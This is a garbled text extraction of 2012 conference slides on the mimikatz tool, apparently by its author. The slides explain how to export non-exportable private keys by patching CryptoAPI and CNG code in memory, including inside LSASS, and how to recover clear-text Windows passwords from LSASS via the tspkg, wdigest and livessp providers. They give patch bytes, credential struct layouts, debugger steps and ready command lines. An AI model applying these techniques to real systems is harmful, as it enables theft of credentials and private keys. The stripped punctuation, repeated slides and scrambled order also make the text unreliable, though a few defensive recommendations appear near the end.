certutil -importpfx mycertp12 NoExport certutil -csp Microsoft Enhanced Cryptographic Provider v10 -importpfx mycertp12 NoExport
mimikatz crypto capi how it works
mimikatz crypto capi how it works
ldquoMicrosoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules CSPs perform all cryptographic operations and manage private keys CSPs can be implemented in software as well as in hardwarerdquo ndash httptechnetmicrosoftcomlibrarycc962093aspx
Processes (mimikatz IIS Active Directory Internet Explorer yourappsherehellip) load some DLL to deal with different cryptographic stuff CSP (keys) smartcard reader hellip ndash cryptdlldll rsaenhdll hellip
Process deal with cryptographic keys by this APIhellip
ldquoMicrosoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules CSPs perform all cryptographic operations and manage private keys CSPs can be implemented in software as well as in hardwarerdquo ndash httptechnetmicrosoftcomlibrarycc962093aspx
Processes (mimikatz IIS Active Directory Internet Explorer yourappsherehellip) load some DLL to deal with different cryptographic stuff CSP (keys) smartcard reader hellip ndash cryptdlldll rsaenhdll hellip
Process deal with cryptographic keys by this APIhellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 40 40
mimikatz crypto capi how itrsquos exported ( level)
mimikatz crypto capi how itrsquos exported ( level)
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 41 41
Process
CryptoAPI and RSA CSP
Exportable
Load Private Key
Exported Key
yes
NTE_BAD_KEY_STATE
no
DPAPI Decode
PLAYSKOOL
Ask to export Key
mimikatz crypto patchcapi because I own my process
mimikatz crypto patchcapi because I own my process
When we want to export a certificate with its private key (or only the key) it goes in rsaenhCPExportKey
This function do all the work to prepare the export and check if the key is exportable
When we want to export a certificate with its private key (or only the key) it goes in rsaenhCPExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 42 42
mimikatz cryptoexportCertificates Emplacement CERT_SYSTEM_STORE_CURRENT_USERMy - Benjamin Delpy Container Cleacute 470ADFBA-8718-4014-B05E-B30776B75A03 Provider Microsoft Enhanced Cryptographic Provider v10 Type AT_KEYEXCHANGE Exportabiliteacute NON Taille cleacute 2048 Export priveacute dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpypfx KO (0x8009000b) Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute Export public dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpyder OK
================ Certificat 0 ================ Numeacutero de seacuterie 112169417a1c3ef46a301f99385f50680fa0 Eacutemetteur CN=GlobalSign CodeSigning CA - G2 O=GlobalSign nv-sa C=BE Objet CN=Benjamin Delpy C=FR Il ne sagit pas dun certificat racine Hach cert (sha1) ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e Conteneur de cleacute = 470ADFBA-8718-4014-B05E-B30776B75A03 Fournisseur = Microsoft Enhanced Cryptographic Provider v10 La cleacute priveacutee NE PEUT PAS ecirctre exporteacutee Succegraves du test de cryptage CertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813) CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
Exportable
mimikatz crypto patchcapi because I own my process
mimikatz crypto patchcapi because I own my process
So what A module in my own process return that I canrsquot do something CryptoAPI is in my memory space letrsquos patch it
I wrote ldquo4rdquo bytes in my memory space
So what A module in my own process return that I canrsquot do something CryptoAPI is in my memory space letrsquos patch it
I wrote ldquo4rdquo bytes in my memory space
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 43 43
text0AC0B7CB 0F 85 33 C7 FF FF jnz continue_key_export_or_archive
text0AC0B7CB 90 nop
text0AC0B7CC E9 33 C7 FF FF jmp continue_key_export_or_archive
text0AC1F749 0F 85 B6 3B FF FF jnz continue_key_export_or_archive_prepare
text0AC1F749 90 nop
text0AC1F74A E9 B6 3B FF FF jmp continue_key_export_or_archive_prepare
mimikatz crypto patchcapi demo time
mimikatz crypto patchcapi demo time
Import export import as not exportablehellip export
Import export import as not exportablehellip export
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 44 44
mimikatz crypto patchcapi limitations
mimikatz crypto patchcapi limitations
Because ndash Irsquom lazy
ndash Irsquove seen in majority of case RSA keys for real life use bull Elliptic Curve a littlehellip
mimikatz cryptopatchcapi only deal with ndash Microsoft Base Cryptographic Provider v10
ndash Microsoft Enhanced Cryptographic Provider v10
ndash Microsoft Enhanced RSA and AES Cryptographic Provider
ndash Microsoft RSA SChannel Cryptographic Provider
ndash Microsoft Strong Cryptographic Provider
hellipall based on rsaenhdll
Because ndash Irsquom lazy
ndash Irsquove seen in majority of case RSA keys for real life use bull Elliptic Curve a littlehellip
mimikatz cryptopatchcapi only deal with ndash Microsoft Base Cryptographic Provider v10
ndash Microsoft Enhanced Cryptographic Provider v10
ndash Microsoft Enhanced RSA and AES Cryptographic Provider
ndash Microsoft RSA SChannel Cryptographic Provider
ndash Microsoft Strong Cryptographic Provider
hellipall based on rsaenhdll
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 45 45
mimikatz crypto cng how it works
mimikatz crypto cng how it works
ldquoCryptography API Next Generation (CNG) is the long-term replacement for the CryptoAPI CNG is designed to be extensible at many levels and cryptography agnostic in behaviorrdquo ndash httpmsdnmicrosoftcomlibrarywindowsdesktopaa376210aspx
ldquoTo comply with common criteria (CC) requirements the long-lived keys must be isolated so that they are never present in the application process CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default
This time keys operations are not made in the ldquouserrdquo process context
Process use RPC to call ldquoKey isolation servicerdquo (keyiso) functions
It seems more secure than CryptoAPIhellip ndash It is but itrsquos not perfecthellip
ldquoCryptography API Next Generation (CNG) is the long-term replacement for the CryptoAPI CNG is designed to be extensible at many levels and cryptography agnostic in behaviorrdquo ndash httpmsdnmicrosoftcomlibrarywindowsdesktopaa376210aspx
ldquoTo comply with common criteria (CC) requirements the long-lived keys must be isolated so that they are never present in the application process CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default
This time keys operations are not made in the ldquouserrdquo process context
Process use RPC to call ldquoKey isolation servicerdquo (keyiso) functions
It seems more secure than CryptoAPIhellip ndash It is but itrsquos not perfecthellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 46 46
mimikatz crypto cng how itrsquos exported ( level)
mimikatz crypto cng how itrsquos exported ( level)
KeyIso Service (LSASS Process)
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 47 47
Process
CNG
Exportable
Load Private Key
Exported Key
yes
NTE_NOT_SUPPORTED
RPC
DPAPI Decode
PLAYSKOOL
Ask to export Key
NT6 System protected process ML_SYSTEM SYSTEM_MANDATORY_LABEL_NO_WRITE_UP SYSTEM_MANDATORY_LABEL_NO_READ_UP
no
mimikatz crypto patchcng because sometimes I own LSASS
mimikatz crypto patchcng because sometimes I own LSASS
When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 48 48
mimikatz cryptoexportKeys [user] Cleacutes CNG - cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Exportabiliteacute NON Taille cleacute 2048 Export priveacute dans cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318pvk KO mod_cryptonggetPrivateKeyPrivateKeyBlobToPVK (0x80090029) Lopeacuteration demandeacutee nest pas prise en charge
Exportable
mimikatz crypto patchcng because sometimes I own LSASS
mimikatz crypto patchcng because sometimes I own LSASS
This time checks and keys are in LSASS processhellip And what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
This time checks and keys are in LSASS processhellip And what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 49 49
text6C815210 75 1C jnz short continue_key_export
text6C815210 EB 1C jmp short continue_key_export
mimikatz crypto patchcng demo time
mimikatz crypto patchcng demo time
Import export import as not exportablehellip export again
Import export import as not exportablehellip export again
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 50 50
mimikatz crypto patchcng limitations
mimikatz crypto patchcng limitations
Patch operation needs some privileges ndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu ) ndash certutil canhellip
Patch operation needs some privileges ndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu ) ndash certutil canhellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 51 51
mimikatz crypto patchcng bonus
mimikatz crypto patchcng bonus
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 52 52
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfx MY ================ Certificat 1 ================ [hellip] Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Fournisseur = Microsoft Software Key Storage Provider La cleacute priveacutee NE PEUT PAS ecirctre exporteacutee Succegraves du test de chiffrement CertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813) CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfx MY ================ Certificat 1 ================ [hellip] Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Fournisseur = Microsoft Software Key Storage Provider Succegraves du test de chiffrement CertUtil -exportPFX La commande sest termineacutee correctement
mimikatz crypto memo
mimikatz crypto memo
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keys ndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keys ndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 53 53
mimikatz crypto what we can do
mimikatz crypto what we can do
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basics ndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depth ndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSP bull Their biometrics stuff was a little buggy )
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basics ndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depth ndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSP bull Their biometrics stuff was a little buggy )
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 54 54
mimikatz what else can it do
mimikatz what else can it do
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driver ndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driver ndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 55 55
mimikatz thatrsquos all folks
mimikatz thatrsquos all folks
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunity bull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challenges bull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunity bull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challenges bull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 56 56
Blog Source Code amp Contact Blog Source Code amp Contact
blog httpbloggentilkiwicom mimikatz httpbloggentilkiwicommimikatz source httpscodegooglecompmimikatz email benjamingentilkiwicom
blog httpbloggentilkiwicom mimikatz httpbloggentilkiwicommimikatz source httpscodegooglecompmimikatz email benjamingentilkiwicom
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 57 57
mimikatz sekurlsa tspkg symbols amp theory
mimikatz sekurlsa tspkg symbols amp theory
Letrsquos explore some symbols
ndash sounds coolhellip (thanks Microsoft)
Letrsquos imagine a scenario ndash Enumerate all sessions to obtain
bull Username
bull Domain
bull LUID
ndash Call tspkgTSCredTableLocateDefaultCreds (rely on RtlLookupElementGenericTableAvl) with LUID to obtain
bull TS_CREDENTIAL
ndash Call tspkgTSObtainClearCreds (rely on LsaUnprotectMemory) with TS_CREDENTIAL data (TS_PRIMARY_CREDENTIAL) for
bull TS_PRIMARY_CREDENTIAL with clear text credentialshellip
Letrsquos explore some symbols
ndash sounds coolhellip (thanks Microsoft)
Letrsquos imagine a scenario ndash Enumerate all sessions to obtain
bull Username
bull Domain
bull LUID
ndash Call tspkgTSCredTableLocateDefaultCreds (rely on RtlLookupElementGenericTableAvl) with LUID to obtain
bull TS_CREDENTIAL
ndash Call tspkgTSObtainClearCreds (rely on LsaUnprotectMemory) with TS_CREDENTIAL data (TS_PRIMARY_CREDENTIAL) for
bull TS_PRIMARY_CREDENTIAL with clear text credentialshellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 13 13
kdgt x tspkgclear 75016d1c tspkgTSObtainClearCreds = ltno type informationgt kdgt x tspkgpassword 75011b68 tspkgTSDuplicatePassword = ltno type informationgt 75011cd4 tspkgTSHidePassword = ltno type informationgt 750195ee tspkgTSRevealPassword = ltno type informationgt 75012fbd tspkgTSUpdateCredentialsPassword = ltno type informationgt kdgt x tspkglocate 7501158b tspkgTSCredTableLocateDefaultCreds = ltno type informationgt
mimikatz sekurlsa tspkg workflow
mimikatz sekurlsa tspkg workflow
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 14 14
RtlLookupElementGenericTableAvl
LsaUnprotectMemory
KIWI_TS_CREDENKIWI_TS_CREDENTIAL
KIWI_TS_PRIMARKIWI_TS_PRIMARY_CREDENTIAL
typedef struct _KIWI_TS_PRIMARY_CREDENTIAL PVOID unk0 LSA_UNICODE_STRING Domaine LSA_UNICODE_STRING UserName LSA_UNICODE_STRING Password
KIWI_TS_PRIMARY_CREDENTIAL PKIWI_TS_PRIMARY_CREDENTIAL
LsaEnumerateLogonSessions
for each LUID
password in clear
tspkgTSGlobalCredTable
typedef struct _KIWI_TS_CREDENTIAL ifdef _M_X64 BYTE unk0[108] elif defined _M_IX86 BYTE unk0[64] endif LUID LocallyUniqueIdentifier PVOID unk1 PVOID unk2 PKIWI_TS_PRIMARY_CREDENTIAL pTsPrimary KIWI_TS_CREDENTIAL PKIWI_TS_CREDENTIAL
KIWI_TS_CREDENKIWI_TS_CREDENTIAL
mimikatz sekurlsa tspkg demo time
mimikatz sekurlsa tspkg demo time
sekurlsatspkg
sekurlsatspkg
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 15 15
mimikatz sekurlsa wdigest mimikatz sekurlsa wdigest
because clear text password over httphttps is not cool
because clear text password over httphttps is not cool
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 16 16
mimikatz sekurlsa wdigest what is it
mimikatz sekurlsa wdigest what is it
ldquoDigest access authentication is one of the agreed-upon methods a web server can use to negotiate credentials with a users web browser It applies a hash function to a password before sending it over the network [hellip]rdquo Wikipedia httpenwikipediaorgwikiDigest_access_authentication
ldquoCommon Digest Authentication Scenarios ndash Authenticated client access to a Web site ndash Authenticated client access using SASL ndash Authenticated client access with integrity protection to a directory service
using LDAPrdquo Microsoft httptechnetmicrosoftcomlibrarycc778868aspx
Again it seems cool ndash No password over the network just hashes ndash No reversible password in Active Directory hashes for each realm
bull Only with Advanced Digest authentication
ldquoDigest access authentication is one of the agreed-upon methods a web server can use to negotiate credentials with a users web browser It applies a hash function to a password before sending it over the network [hellip]rdquo Wikipedia httpenwikipediaorgwikiDigest_access_authentication
ldquoCommon Digest Authentication Scenarios ndash Authenticated client access to a Web site ndash Authenticated client access using SASL ndash Authenticated client access with integrity protection to a directory service
using LDAPrdquo Microsoft httptechnetmicrosoftcomlibrarycc778868aspx
Again it seems cool ndash No password over the network just hashes ndash No reversible password in Active Directory hashes for each realm
bull Only with Advanced Digest authentication
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 17 17
mimikatz sekurlsa wdigest what is it
mimikatz sekurlsa wdigest what is it
We speak about hashes but what hashes H = MD5(HA1nonce[hellip]HA2)
bull HA1 = MD5(usernamerealmpassword)
bull HA2 = MD5(methoddigestURI[hellip])
Even after login HA1 may changehellip realm is from server side and cannot be determined before Windows logon
WDigest provider must have elements to compute responses for different servers ndash Username
ndash Realm (from server)
ndash Password
We speak about hashes but what hashes H = MD5(HA1nonce[hellip]HA2)
bull HA1 = MD5(usernamerealmpassword)
bull HA2 = MD5(methoddigestURI[hellip])
Even after login HA1 may changehellip realm is from server side and cannot be determined before Windows logon
WDigest provider must have elements to compute responses for different servers ndash Username
ndash Realm (from server)
ndash Password
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 18 18
mimikatz sekurlsa wdigest theory
mimikatz sekurlsa wdigest theory
This time we know ndash that WDigest keeps password in memory laquo by protocol raquo for HA1 digest ndash that LSASS love to unprotect password with LsaUnprotectMemory (so protect
with LsaProtectMemory)
LsaUnprotectMemory ndash At offset 0xb4 of LSA_SECPKG_FUNCTION_TABLE ndash Letrsquos perform a research in WDigest
ndash Hypothesis seems verified
LsaProtectMemory ndash At offset 0xb0 of LSA_SECPKG_FUNCTION_TABLE ndash Letrsquos perform a research in WDigest
ndash SpAcceptCredentials takes clear password in args
bull Protect it with LsaProtectMemory bull Update or insert data in double linked list wdigestl_LogSessList
This time we know ndash that WDigest keeps password in memory laquo by protocol raquo for HA1 digest ndash that LSASS love to unprotect password with LsaUnprotectMemory (so protect
with LsaProtectMemory)
LsaUnprotectMemory ndash At offset 0xb4 of LSA_SECPKG_FUNCTION_TABLE ndash Letrsquos perform a research in WDigest
ndash Hypothesis seems verified
LsaProtectMemory ndash At offset 0xb0 of LSA_SECPKG_FUNCTION_TABLE ndash Letrsquos perform a research in WDigest
ndash SpAcceptCredentials takes clear password in args
bull Protect it with LsaProtectMemory bull Update or insert data in double linked list wdigestl_LogSessList
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 19 19
text7409D151 _DigestCalcHA18 call dword ptr [eax+0B4h]
text74096C69 _SpAcceptCredentials16 call dword ptr [eax+0B0h]
mimikatz sekurlsa wdigest workflow
mimikatz sekurlsa wdigest workflow
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 20 20
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
typedef struct _KIWI_WDIGEST_LIST_ENTRY struct _KIWI_WDIGEST_LIST_ENTRY Flink struct _KIWI_WDIGEST_LIST_ENTRY Blink DWORD UsageCount struct _KIWI_WDIGEST_LIST_ENTRY This LUID LocallyUniqueIdentifier [hellip] LSA_UNICODE_STRING UserName LSA_UNICODE_STRING Domaine LSA_UNICODE_STRING Password [hellip]
KIWI_WDIGEST_LIST_ENTRY PKIWI_WDIGEST_LIST_ENTRY
wdigestl_LogSessList
search linked list for LUID
KIWI_WDIGEST_LKIWI_WDIGEST_LIST_ENTRY
password in clear
mimikatz sekurlsa wdigest demo time
mimikatz sekurlsa wdigest demo time
sekurlsawdigest
sekurlsawdigest
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 21 21
mimikatz sekurlsa livessp mimikatz sekurlsa livessp
because Microsoft was too good in closed networks
because Microsoft was too good in closed networks
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 22 22
mimikatz sekurlsa livessp how
mimikatz sekurlsa livessp how
Actually Irsquove only used logical (empirical) approach to search passwordshellip ndash Protocol reading
ndash Symbols searching
~ Boring ~hellip be more brutal this time make a WinDBG trap
Actually Irsquove only used logical (empirical) approach to search passwordshellip ndash Protocol reading
ndash Symbols searching
~ Boring ~hellip be more brutal this time make a WinDBG trap
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 23 23
0 kdgt process 0 0 lsassexe PROCESS 83569040 SessionId 0 Cid 0224 Peb 7f43f000 ParentCid 01b4 DirBase 5df58100 ObjectTable 80ce4740 HandleCount ltData Not Accessiblegt Image lsassexe 0 kdgt process i 83569040 You need to continue execution (press g ltentergt) for the context to be switched When the debugger breaks in again you will be in the new process context 0 kdgt g Break instruction exception - code 80000003 (first chance) ntRtlpBreakWithStatusInstruction 814b39d0 cc int 3 0 kdgt reload user Loading User Symbols 0 kdgt bp p $proc lsasrvLsaProtectMemory kc 5 g 0 kdgt g
mimikatz sekurlsa livessp how
mimikatz sekurlsa livessp how
Letrsquos login with a Live account on Windows 8
After credentials protection LsaApLogonUserEx2 calls LiveCreateLogonSession to insert data in LiveGlobalLogonSessionList (similar to WDigest)
Letrsquos login with a Live account on Windows 8
After credentials protection LsaApLogonUserEx2 calls LiveCreateLogonSession to insert data in LiveGlobalLogonSessionList (similar to WDigest)
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 24 24
lsasrvLsaProtectMemory livesspLiveMakeSupplementalCred livesspLiveMakeSecPkgCredentials livesspLsaApLogonUserEx2 livesspSpiLogonUserEx2 lsasrvLsaProtectMemory msv1_0NlpAddPrimaryCredential msv1_0SspAcceptCredentials msv1_0SpAcceptCredentials lsasrvLsaProtectMemory tspkgTSHidePassword tspkgSpAcceptCredentials
1 kdgt uf c livesspLsaApLogonUserEx2 livesspLsaApLogonUserEx2 (74781536) [] livesspLsaApLogonUserEx2+0x560 (74781a96) call to livesspLiveCreateLogonSession (74784867)
Our LiveSSP provider
Yeah Pass the Hash capability with Live account toohellip
Live user can logon through RDP via SSO
mimikatz sekurlsa livessp workflow
mimikatz sekurlsa livessp workflow
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 25 25
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
password in clear
